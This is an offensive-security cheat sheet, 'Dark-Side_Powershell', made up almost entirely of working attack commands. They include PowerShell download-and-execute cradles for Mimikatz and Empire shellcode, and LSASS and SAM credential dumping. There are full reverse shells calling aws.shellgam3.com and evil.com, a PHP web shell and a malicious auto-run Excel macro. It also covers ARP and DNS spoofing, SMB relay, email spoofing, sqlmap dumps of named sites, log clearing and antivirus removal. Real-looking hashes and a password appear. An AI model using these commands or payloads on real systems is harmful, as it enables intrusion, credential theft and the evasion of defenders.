Dark-Side_Powershell

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-UserHunter


powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetLocalGroup

powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin


powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-StealthUserHunter
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit

powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-FileFinder


powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');


BloodHound:
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');Invoke-Bloodhound -CSVFolder C:\Temp


---
powershell_shell: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\temp

meterpreter > download c:\\Windows\\Temp\\lsass_632.dmp

python -m SimpleHTTPServer 9000

sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords

recon and finding other networks:
fping 192.168.0.0/16 | grep -a "alive"


---


powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1');

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.45:8080/')


reg.exe save hklm\sam c:\temp\sam.save

reg.exe save hklm\security c:\temp\security.save

reg.exe save hklm\system c:\temp\system.save


root@kali:~# nmap 190.57.29.177 -v -Pn -sT -A -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"


BDFproxy:
veil option - #50
echo 1 > /proc/sys/net/ipv4/ip_forward
./bdf_proxy.py
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.75; set LPORT 4444; set exitonsession false; exploit -j"
arpspoof -i eth0 -t target.ip router.ip
arpspoof -i eth0 -t router.ip target.ip
msfconsole -r bdfproxy_msf_resource.rc


nmap -A -oG - 190.57.29.0/24 -p 445 --osscan-guess | grep -a "Windows Server"


IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1"); Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ConsoleStatus 1

procdump -ma lsass.exe lsass.dmp

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’); Get-NetUser -AdminCount | Select name,whencreated,pwdlastset,lastlogon


***
sudo msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 443; set exitonsession false; exploit -j"


powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 443"


rubber ducky:

java -jar duckencode.jar -i "reverse shell.txt"


smbrelay:

msfconsole -x "use exploit/multi/script/web_delivery; set target 2; set URIPATH /; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.62; set exitonsession false; exploit -j"

./responder.py -I eth0

./smbrelayx.py -h 192.168.22.151 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.119:8080/')"

"powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

pth-winexe -U gp-wks-conf2/Administrator%aad3b435b51404eeaad3b435b51404ee:6154da6030a803632a63b1a0e1a3aeb3 //192.168.22.46 cmd


nbtscan -r 192.168.22.0/24
fping -g -d 192.168.23.0/24 2>/dev/null | grep alive

capture ntlm handshake (snarf + responder)
crack password from handshake (john)
password spray to find local admin (metasploit)
establish shells with local admin boxes (metasploit)


snarf + responder:
nodejs snarf.js 192.168.22.62 -d 192.168.22.41
john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
responder -I eth0

find local admin (post exploit):
use auxiliary/scanner/smb/smb_login
set smbdomain <domain>
set smbuser <username>
set smbpass <password>
set rhosts 0.0.0.0/24

Shell:
msfconsole: use exploit/windows/smb/psexec
msfconsole: set payload windows/meterpreter/reverse_https
run post/windows/gather/smart_hashdump

dumping creds/hashes:
run post/windows/gather/cachedump
run post/windows/gather/smart_hashdump
load mimikatz > wdigest

cracking hashes:
john --format=mscash2 --wordlist=/media/sf_Shared/wordlists/rockyou.txt --rules=all gp_hashes.txt
john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt


password spraying:
http://www.blackhillsinfosec.com/?p=4989
@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /.\Administrator
AdminPass 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use
/delete \\%s\C$ > NUL

rpcclient:
http://carnal0wnage.attackresearch.com/2010/06/more-with-rpcclient.html
find local DC first, then ->
rpcclient -U "" -N <ip addr of DC>
commands: ?

xfreerdp /u:jwelkley /p:GoBears1 /d:gp /v:192.168.2.60 /sec:rdp

metasploit basics:
gain  access
getuid
getpid
sysinfo
run PS
migrate process


Reverse Meterpreter Shell:
ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run"
powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 8443"


Dump wireless PSKs:
(netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)}  | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

DNS subdomain enumeration:
dnsrecon -d wabt.com -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123


./proxychains4 nmap -p 53 -v -Pn -sS 8.8.8.8 -e eth0


snarf + responder:
nodejs snarf.js 192.168.22.62 -d 192.168.22.41
john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
responder -I eth0

MiTM:
netstat -nr
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t target.ip router.ip
arpspoof -i eth0 -t router.ip target.ip

MiTM via mitmf:
mitmf -i eth0 --arp --spoof --hsts --gateway=10.0.0.1 --target=192.168.0.1

Beef:
./beef
mitmf -i eth0 --arp --spoof --hsts --gateway=192.168.0.1 --target=192.168.0.2 --inject --js-url http://192.168.0.5:300/hook.js

DNS subdomain brute forcing:
dnsrecon -d wpcu.coop -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123


Certificate injection:
mitm +
mitmproxy -T --host

PtH with Metasploit:
Kali: 173.18.131.94
Victim: 173.18.131.111

root@kali:/usr/bin# ./msfconsole
 msf > use exploit/windows/smb/psexec
 msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf exploit(psexec) > set lhost 173.18.131.94
 lhost => 173.18.131.94
 msf exploit(psexec) > set rhost 173.18.131.111
 rhost => 173.18.131.111
 msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
 smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
 msf exploit(psexec) > set smbuser administrator
 smbuser => administrator
 msf exploit(psexec) > set smbdomain test
 smbdomain => test
 msf exploit(psexec) > exploit


smb relay attack:
Metasploit box: 172.17.130.81
Domain Admin Workstation: 172.17.130.33
Target Server: 172.17.130.75
msfconsole -x “use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run”
-embed in email message:
<html>
<head>
<img src=”\\172.17.130.81\test.jpg”></img>
</head>
</html>

spoofing email via telnet:
root@kali:~# telnet mx1.mail.icloud.com 25
 Trying 17.158.8.67…
 Connected to mx1.mail.icloud.com.
 Escape character is ‘^]’.
 220 nk11p00mm-smtpin001.mac.com — Server ESMTP (Oracle Communications Messaging Server 7.0.5.36.0 64bit (built Sep 8 2015))
 helo whatever.com
 250 nk11p00mm-smtpin001.mac.com OK, 50-197-245-29-static.hfc.comcastbusiness.net [XX.197.XXX.29].
 mail from:bob@icloud.com
 250 2.5.0 Address Ok.
 rcpt to:nickvangilder@icloud.com
 250 2.1.5 nickvangilder@icloud.com OK.
 data
 354 Enter mail, end with a single “.”.
 To:Nick VanGilder<nickvangilder@icloud.com>
 From:Bob Dole<bob@icloud.com>
 Reply-To:Bob Dole<nickvangilder@outlook.com>
 Subject:Test

This is a test
 .
 250 2.5.0 Ok.

check public ip address:
proxychains curl ipecho.net/plain

powershell
import-module activedirectory
get-aduser -filter {PasswordNeverExpires -eq $True -AND Enabled -eq $True} -properties PasswordLastSet | Sort PasswordLastSet | Select Distinguishedname,PasswordLastSet


on linux box: nc -lvp 8443
powershell ->
$client = New-Object System.Net.Sockets.TCPClient("aws.shellgam3.com",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -exec bypass -file payload.ps1


one-liner:
powershell -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.22.63',8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

To enumerate all domain controllers:
nltest /dclist:domain.local

Enumerate local admins:
net localgroup Administrators


Get-ADDefaultDomainPasswordPolicy
net group "domain admins" /domain

Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile("http ://10.10.10.10/nc.exe","nc.exe")

wmic computersystem get model,name,manufacturer,systemtype


File injection:
MiTM +
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
./mitmproxy -T -s “iframe_injector.py http://www.website.com/files/malicious_file.xlsm;


cmdkey.exe /add:MACHINE_NAME_HERE /user:MACHINE_NAME_HERE\Administrator /pass:PASSWORD_HERE
cmdkey.exe /delete:MACHINE_NAME_HERE

https://download.sysinternals.com/files/PSTools.zip
copy file to target
psexec \\target -u username -p password cmd.exe
start c:\path\payload.vbs


Enable RDP:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable RDP:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

web app recon and scanning:

proxychains, proxychains4, torify, tor-resolve
service tor start
service tor status
dont forget to modify /etc/resolv.conf = 127.0.0.1
protect against accidental discolsure = sudo iptables -A OUTPUT --dest <target> -j DROP


proxychains nmap -v -sN -n 207.223.121.128 -PN

nmap ip.adddress -v -Pn -sT
nmap -Sv -T4 hostname.com
dirb https://www.example.com
grabber --url www.site.com --spider 1 --sql
uniscan -d -u test.com
/usr/share/zaproxy# java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9050 -jar zap-2.4.1.jar
nikto -h http://www.site.com
whatweb test.com
w3af_console
wpscan

sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --risk=3 --level=5 --threads=10 --dbs --dump -D Database_name -T table_name -u http://xxxxx.com/board/board.php?id=6
sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --threads=10 --crawl=2 --risk=3 --level=5 --dump -u http://host.com/board.php?id=6
sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --dump -u https://test.com --sql-shell
sqlmap --tor --tor-type=socks5 --check-tor --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=4 --batch -f --dbs -u https://review.logicforce.com
sqlmap --random-agent --keep-alive --level=5 --forms --crawl=2 --risk=3 --threads=10 --batch -f --dump --dbs -u https://xxxxxxx.com

sqlmap --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=10 --level=5 --batch -f --dbs -u http://human.firstcommunitymortgage.com/fha-loans/?gcf_captcha


Look for HTTP PUT:
curl -X OPTIONS -v http://200.x.x.x/test/

UPLOAD FILE:
curl --upload-file /root/Desktop/reverse_shell.php -v --url http://172.17.130.93/test/rshell.php -0 --http1.0
curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage
curl -X PUT -d "text or data to put" http://www.victim.com/destination_page
curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page

first put this into cmd.php:
<?php echo system($_GET["cmd"]); ?>

THEN, for shell access:

this one worked:
put this in filename.sh

http://172.17.130.93/test/cmd.php?cmd=filename.sh
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done

Macro enabled xlsm:
ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run"

Private Sub Auto_Open()
strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 ');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.x.x.123 -Lport 8443"
Set WshShell = CreateObject("WScript.Shell")
Set WshShellExec = WshShell.Exec(strCommand)
End Sub

DNS Spoofing:
#IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

#DNS Port Redirection
iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53

#ARP Cache Poisioning / MitM
arpspoof -i eth0 -t victimIP routerIP
arpspoof -i eth0 -t routerIP victimIP

#DNS Spoofing
dnschef -i 172.17.130.60 --fakeip=52.37.49.217 --fakedomains=test.com
#172.17.130.60 = my internal Kali box
#Fake IP = where you want to redirect to
#Fake Domains = name of domain to redirect


View your current user: whoami
View information about the current user: net user myuser(for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
 net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
 sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
 netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
 netsh interface ip show route
 netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
 dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Blind Files
%SYSTEMDRIVE%\boot.ini
A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini

This is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system

System
whoami /all
set
fsutil fsinfo drives
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"

ipconfig /all
ipconfig /displaydns
netstat -nabo
netstat -s -p [tcp|udp|icpm|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING
netstat -nao | findstr LISTENING
netstat -na | findstr LISTENING
netsh diag show all

net view
net view /domain
net view /domain:otherdomain
net user %USERNAME% /domain
net user /domain
net accounts
net accounts /domain
net localgroup administrators
net localgroup administrators /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net group “Domain Controllers” /domain
nbtstat -a [ip here]
net share
net session | find / “\\”
arp -a
route print
browstat (Not working on XP)
netsh wlan show profiles
shows all saved wireless profiles. You may then export the info for those profiles with the command below
netsh wlan export profile folder=. key=clear
netsh wlan [start|stop] hostednetwork
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
netsh wlan set hostednetwork mode=[allow|disallow]
wmic ntdomain list Retrieve information about Domain and Domain Controller


gpresult /z
sc qc
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
echo %COMSPEC%
c:\windows\system32\gathernetworkinfo.vbs
tree C:\ /f /a > C:\output_of_tree.txt
dir /a
dir /b /s [Directory or Filename]
dir \ /s /b | find /I “searchstring”

%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
unattend.txt, unattend.xml, sysprep.inf

net share \\computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername
net use \\computername /user:DOMAIN\username password
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\   (dir list a remote directory)
tasklist /V /S computername
Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount

WMI
wmic bios
wmic qfe qfe get hotfixid
wmic startupwmic service
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

reg save HKLM\Security security.hive  (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )

Deleting Logs
wevtutil el  (list logs)
wevtutil cl <LogName> (Clear specific lowbadming)
del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive)
wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)


# Other  (to be sorted)

pkgmgr usefull  /iu :”Package”
pkgmgr usefull  /iu :”TelnetServer” (Install Telnet Service ...)
pkgmgr /iu:”TelnetClient” (Client )
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>


Vista/7

winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
bcdedit /export <filename>

#Disables the local windows firewall
netsh firewall set opmode disable

#Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.
netsh firewall set opmode enable

@FOR /F %n in (users.txt) DO @FOR /F %p in (password.txt) DO @net use \\192.168.200.1 /user:domain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\192.168.200.1\IPC$ > NUL